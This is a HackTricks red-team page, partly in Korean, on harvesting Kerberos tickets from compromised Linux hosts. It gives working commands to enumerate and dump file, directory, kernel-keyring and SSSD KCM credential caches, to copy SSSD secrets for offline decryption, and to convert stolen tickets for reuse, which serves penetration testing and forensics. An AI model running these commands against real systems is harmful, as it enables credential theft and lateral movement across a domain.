Harvesting Tickets from Linux

Tip

Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Credential Storage in Linux

Linux systems store credentials in three kinds of cache: Files (in the /tmp directory), Kernel Keyrings (a special segment inside the Linux kernel), and Process Memory (for single-process use). The default_ccache_name variable in /etc/krb5.conf tells you which storage type is in use; when it is not set, the default is FILE:/tmp/krb5cc_%{uid}.

MIT/Heimdal also support additional backends that are worth looking for during post-exploitation:

  • DIR:/run/user/%{uid}/krb5cc for directory-backed multi-ticket caches (systemd-logind default on modern distros).
  • KEYRING:persistent:%{uid} or KEYRING:session to stash ccaches inside the kernel keyring (KEY_SPEC_SESSION_KEYRING, KEY_SPEC_USER_KEYRING, etc.).
  • KCM:%{uid} when SSSD's Kerberos Cache Manager daemon (kcm) fronts ticket storage.
  • MEMORY:unique_id for process-local caches created by libraries (gssproxy, sshd, etc.).

์…ธ์„ ํš๋“ํ•  ๋•Œ๋งˆ๋‹ค, ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜๊ธฐ ์ „์— ์–ด๋–ค ์บ์‹œ ๋ฐฑ์—”๋“œ๊ฐ€ ์‚ฌ์šฉ๋˜๋Š”์ง€ ํ™•์ธํ•˜๋ ค๋ฉด ๊ด€์‹ฌ ์žˆ๋Š” ๋ฐ๋ชฌ (e.g. Apache, sshd, gssproxy)์˜ /proc/<pid>/environ์—์„œ KRB5CCNAME์„ ๋คํ”„ํ•˜์„ธ์š”.

Enumerating Active Caches

๊ณ ๊ฐ€์น˜ ํ‹ฐ์ผ“์„ ๋†“์น˜์ง€ ์•Š๋„๋ก ์ถ”์ถœ ์ „์— ์บ์‹œ๋ฅผ ์—ด๊ฑฐํ•˜์„ธ์š”:

$ klist -l            # list caches registered in the local keyring/KCM collection
$ klist -A            # show the tickets in every cache of the collection
$ sudo keyctl get_persistent @u
$ sudo keyctl show `keyctl get_persistent @u`
$ sudo ls -al /tmp/krb5cc_* /run/user/*/krb5cc*
$ sudo find /proc -maxdepth 2 -name environ -exec sh -c 'tr "\0" "\n" < "$1" | grep KRB5 | sed "s|^|$1: |"' _ {} \;

The combination of klist, keyctl, and /proc inspection quickly reveals whether credentials live in files, keyrings, or KCM so you can pick the right dumping technique.

์ž๊ฒฉ ์ฆ๋ช… ์ถ”์ถœ

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.

Keyring Extraction Overview

์ปค๋„ ๋ฒ„์ „ 2.6.10์—์„œ ๋„์ž…๋œ keyctl system call์€ ์‚ฌ์šฉ์ž ๊ณต๊ฐ„ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด kernel keyrings์™€ ์ƒํ˜ธ์ž‘์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค€๋‹ค. keyrings์— ์ €์žฅ๋œ ์ž๊ฒฉ์ฆ๋ช…์€ ์ปดํฌ๋„ŒํŠธ(๊ธฐ๋ณธ principal ๋ฐ credentials)๋กœ ์ €์žฅ๋˜๋ฉฐ, ํ—ค๋”๋ฅผ ํฌํ•จํ•˜๋Š” ํŒŒ์ผ ccaches์™€๋Š” ๋‹ค๋ฅด๋‹ค. ๋…ผ๋ฌธ์˜ hercules.sh script๋Š” ์ด๋Ÿฌํ•œ ์ปดํฌ๋„ŒํŠธ๋“ค์„ ์ถ”์ถœํ•˜๊ณ  ์žฌ๊ตฌ์„ฑํ•˜์—ฌ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ํŒŒ์ผ ccache๋กœ ๋งŒ๋“œ๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด์—ฌ์ค€๋‹ค. keyring์— ์ €์žฅ๋œ ccaches๋Š” ๋กœ๊ทธ์ธ ๊ฐ„ ์ง€์†๋˜๋Š” KEYRING:persistent:%{uid}, ๋กœ๊ทธ์•„์›ƒ ์‹œ ์‚ญ์ œ๋˜๋Š” KEYRING:session, ๋˜๋Š” ํ—ฌํผ ์Šค๋ ˆ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ์„œ๋น„์Šค์˜ ๊ฒฝ์šฐ KEY_SPEC_THREAD_KEYRING ๋“ฑ์— ์กด์žฌํ•  ์ˆ˜ ์žˆ์œผ๋‹ˆ, ์†์ƒ๋œ UID์— ๋Œ€ํ•ด ๋ชจ๋“  keyring ์œ ํ˜•์„ ํ•ญ์ƒ ์—ด๊ฑฐํ•˜๋ผ.

Manual KEYRING Workflow

You can manually harvest tickets without helper scripts whenever default_ccache_name is set to KEYRING:

$ KRING=$(keyctl get_persistent @u)
$ keyctl show $KRING                       # note the key serial of each ccache blob
$ keyctl pipe <serial> > /tmp/ccache_dump  # write raw blob to disk
$ KRB5CCNAME=/tmp/ccache_dump klist        # validate the stolen cache

์—ฌ๋Ÿฌ principals์ด ์ €์žฅ๋˜์–ด ์žˆ์œผ๋ฉด, ์‹œ๋ฆฌ์–ผ๋ณ„๋กœ keyctl pipe ๋‹จ๊ณ„๋ฅผ ๋ฐ˜๋ณตํ•œ ๋‹ค์Œ, ์ถ”์ถœํ•œ ccache๋ฅผ kerbtool(์•„๋ž˜ ์ฐธ์กฐ) ๋˜๋Š” ticketConverter.py ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•ด Windows์— ํ˜ธํ™˜๋˜๋Š” .kirbi/.ccache๋กœ ๋ณ€ํ™˜ํ•œ ๋’ค ๋‹ค๋ฅธ ๋จธ์‹ ์—์„œ ์žฌ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค.

File/DIR Cache Theft Quick Wins

์ž๊ฒฉ ์ฆ๋ช…์ด FILE: ๋˜๋Š” DIR: ์บ์‹œ์— ์ €์žฅ๋˜์–ด ์žˆ์„ ๋•Œ๋Š”, ์ผ๋ฐ˜์ ์œผ๋กœ ๊ฐ„๋‹จํ•œ ํŒŒ์ผ ์ž‘์—…๋งŒ์œผ๋กœ ์ถฉ๋ถ„ํ•ฉ๋‹ˆ๋‹ค:

$ sudo cp /tmp/krb5cc_1000 /tmp/websvc.ccache
$ sudo cp -r /run/user/1000/krb5cc /tmp/user1000_dircc
$ chmod 600 /tmp/*.ccache && chown attacker /tmp/*.ccache

Directory caches contain one file per service ticket, so compress and exfiltrate the whole directory to keep TGT + TGS pairs intact. You can also point your tooling at the directory directly: KRB5CCNAME=DIR:/tmp/user1000_dircc impacket-psexec ....

Dumping KCM-Managed Caches

SSSD์˜ Kerberos Cache Manager (kcm)๋Š” /var/run/kcm/kcmsock (๋˜๋Š” /run/.heim_org.h5l.kcm-socket)์„ ํ†ตํ•ด ์ž๊ฒฉ ์ฆ๋ช… ์ €์žฅ์„ ํ”„๋ก์‹œํ•˜๊ณ , ์•”ํ˜ธํ™”๋œ ๋ธ”๋กญ์„ .secrets.mkey์™€ ํ•จ๊ป˜ /var/lib/sss/secrets/ ์•ˆ์— ์ง€์†์ ์œผ๋กœ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ ์ˆœ์„œ:

  1. Identify KCM usage via /etc/krb5.conf (default_ccache_name = KCM:) or the output of klist -l.
  2. If you are UID 0 or inside the kcm SELinux domain, enumerate the caches through the management tool:
     $ sudo kcm_ctl list                 # lists UID + cache IDs handled by kcm
     $ sudo kcm_ctl get 1000 0 > /tmp/1000.kcm.ccache
     $ KRB5CCNAME=/tmp/1000.kcm.ccache klist
  3. Offline approach: copy /var/lib/sss/secrets/secrets.ldb plus /var/lib/sss/secrets/.secrets.mkey, then run SSSDKCMExtractor (or similar PoCs) to decrypt and reassemble ccaches without touching the live socket. This is especially useful in forensics or when socket ACLs block you but disk access is possible.

kcm ๋ฐ๋ชฌ์ด SSSD์— ์˜ํ•ด ๊ฐ•์ œ๋˜๋Š” UID ๊ธฐ๋ฐ˜ ACL์„ ์ค€์ˆ˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์—, ์ผ๋ฐ˜์ ์œผ๋กœ root๋กœ์˜ ๊ถŒํ•œ ์ƒ์Šน(๋˜๋Š” sssd_kcm ์†์ƒ)์ด ํ•„์š”ํ•˜์ง€๋งŒ, ์ผ๋‹จ ๋‹ฌ์„ฑํ•˜๋ฉด ๋ชจ๋“  ์‚ฌ์šฉ์ž์˜ TGT๋ฅผ ๋ช‡ ์ดˆ ์•ˆ์— ๋คํ”„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Ticket Extraction Tooling

์œ„ ๋‹จ๊ณ„๋ฅผ ์ž๋™ํ™”ํ•˜๋ฉด ์‹ค์ˆ˜๋ฅผ ์ค„์ด๊ณ  Windows ๋„๊ตฌ์—์„œ ์žฌ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ํฌ๋กœ์Šค ํ”Œ๋žซํผ ํ‹ฐ์ผ“ ์ž๋ฃŒ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i. It enumerates kernel keyrings, reconstructs the serialized ccaches, and writes MIT-compatible cache files you can immediately feed to klist, impacket-*, or kerberoast tooling.

Kerbtool

kerbtool is a modern Go utility that runs natively on Linux and can parse, convert, and request Kerberos tickets. Two handy use cases when harvesting from Linux boxes:

# Convert a stolen MIT ccache into a .kirbi usable by Windows tooling
$ ./kerbtool --convert --in /tmp/websvc.ccache --out websvc.kirbi

# Use an extracted cache to request additional TGS tickets without touching the victim again
$ KRB5CCNAME=/tmp/websvc.ccache ./kerbtool --ask --spn cifs/fileserver.lab.local

Keeping both tickey and kerbtool on the implant host lets you move smoothly between Linux, Windows and cross-platform Kerberos attack chains.

์ฐธ๊ณ ์ž๋ฃŒ
